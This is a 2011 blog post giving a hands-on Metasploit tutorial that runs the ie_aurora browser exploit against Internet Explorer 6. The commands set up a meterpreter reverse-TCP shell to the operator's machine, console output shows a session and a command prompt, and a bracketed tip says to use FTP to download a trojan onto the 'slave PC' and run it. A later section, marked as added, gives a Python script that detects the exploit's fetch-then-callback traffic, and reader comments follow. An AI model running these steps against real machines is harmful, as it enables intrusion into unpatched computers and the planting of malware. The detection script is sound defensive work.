Infolink

Wednesday, March 9, 2011

Metasploit - Tutorial

First you must download Metasploit:
Code:
http://www.metasploit.com/releases/framework-3.3.3.exe

(Windows OS)
After download and install:

Run Metasploit Update and wait until the update completes!
Then run Metasploit Console.

Then do like this (the bold text is what you must type):

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>


[ Remember, CMD is the most useful control of Win32. You can use the FTP command to download a trojan onto the slave PC and run it. ]
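From the defender's side, the transcript above has two observable artifacts: the victim's browser fetches the exploit page from the attacker's host on port 8080, and a few seconds later the same browser opens a second connection to the same host on port 4444, the reverse handler port shown in the console output. The following Python script is an added example, not code from the blog post or from the Metasploit project; it runs a simple detection over constructed connection-log lines whose format (src/sport/dst/dport/proto/app) is assumed here, using the addresses and ports from the transcript as sample data.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample connection log (not from the original post). The first
# three lines mirror the transcript: 192.168.0.166 browses a normal site, then
# fetches the exploit page from 192.168.0.151:8080, then its browser calls back
# to 192.168.0.151:4444. The remaining lines are ordinary traffic.
SAMPLE_LOG = """\
2011-03-09T10:15:01 src=192.168.0.166 sport=1502 dst=203.0.113.5 dport=80 proto=tcp app=iexplore.exe
2011-03-09T10:15:02 src=192.168.0.166 sport=1510 dst=192.168.0.151 dport=8080 proto=tcp app=iexplore.exe
2011-03-09T10:15:05 src=192.168.0.166 sport=1514 dst=192.168.0.151 dport=4444 proto=tcp app=iexplore.exe
2011-03-09T10:16:30 src=192.168.0.170 sport=2201 dst=192.168.0.10 dport=445 proto=tcp app=System
2011-03-09T10:17:00 src=192.168.0.170 sport=2210 dst=203.0.113.5 dport=443 proto=tcp app=firefox.exe
"""

# Assumed log line layout; adjust the pattern for a real firewall/EDR export.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) sport=(?P<sport>\d+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\S+) app=(?P<app>\S+)$"
)

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
WEB_PORTS = {80, 443, 8000, 8080, 8443}
# The transcript shows "Started reverse handler on port 4444", Metasploit's default.
DEFAULT_HANDLER_PORT = 4444
# Seconds between the page fetch and the callback that we still consider linked.
CALLBACK_WINDOW_SECONDS = 60


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the layout are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        records.append({
            "ts": datetime.fromisoformat(d["ts"]),
            "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"]),
            "proto": d["proto"], "app": d["app"].lower(),
        })
    return records


def detect_browser_callbacks(records):
    """Return (rule, src, dst, dport) alerts for browser-originated callbacks."""
    alerts = []

    # Rule 1: a browser process connecting to the well-known default handler port.
    for r in records:
        if r["app"] in BROWSERS and r["dport"] == DEFAULT_HANDLER_PORT:
            alerts.append(("browser_to_default_handler_port", r["src"], r["dst"], r["dport"]))

    # Rule 2: a browser fetches from host X on a web port, then within the window
    # the same browser opens a non-web-port connection to that same host X.
    # This catches the fetch-then-callback shape regardless of the port chosen.
    by_pair = defaultdict(list)
    for r in records:
        if r["app"] in BROWSERS:
            by_pair[(r["src"], r["dst"])].append(r)
    for (src, dst), conns in by_pair.items():
        conns.sort(key=lambda r: r["ts"])
        for i, first in enumerate(conns):
            if first["dport"] not in WEB_PORTS:
                continue
            for later in conns[i + 1:]:
                if (later["ts"] - first["ts"]).total_seconds() > CALLBACK_WINDOW_SECONDS:
                    break
                if later["dport"] not in WEB_PORTS:
                    alerts.append(("web_fetch_then_nonweb_callback", src, dst, later["dport"]))
    return alerts


def run_sample():
    """Run both rules over the constructed sample log."""
    return detect_browser_callbacks(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Rule 1 is cheap but only catches the default port; rule 2 is the one worth keeping, because it keys on the sequence the transcript demonstrates (page fetch, then a non-web connection back to the same host from the browser process) and does not depend on the port the handler was configured with. Both rules produce false positives for legitimate sites that serve non-HTTP services on the same host, so in practice the alert is a triage cue for the host's process and proxy logs rather than a verdict.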

3 comments:

  1. Problem: after you created the shell, what can you do?

  2. nvm, but does it still work, and is there any concept of how this works? Because I think this is really cool.

  3. After you have created the shell you can execute any command on the remote computer. And it works if the other computer is unpatched.
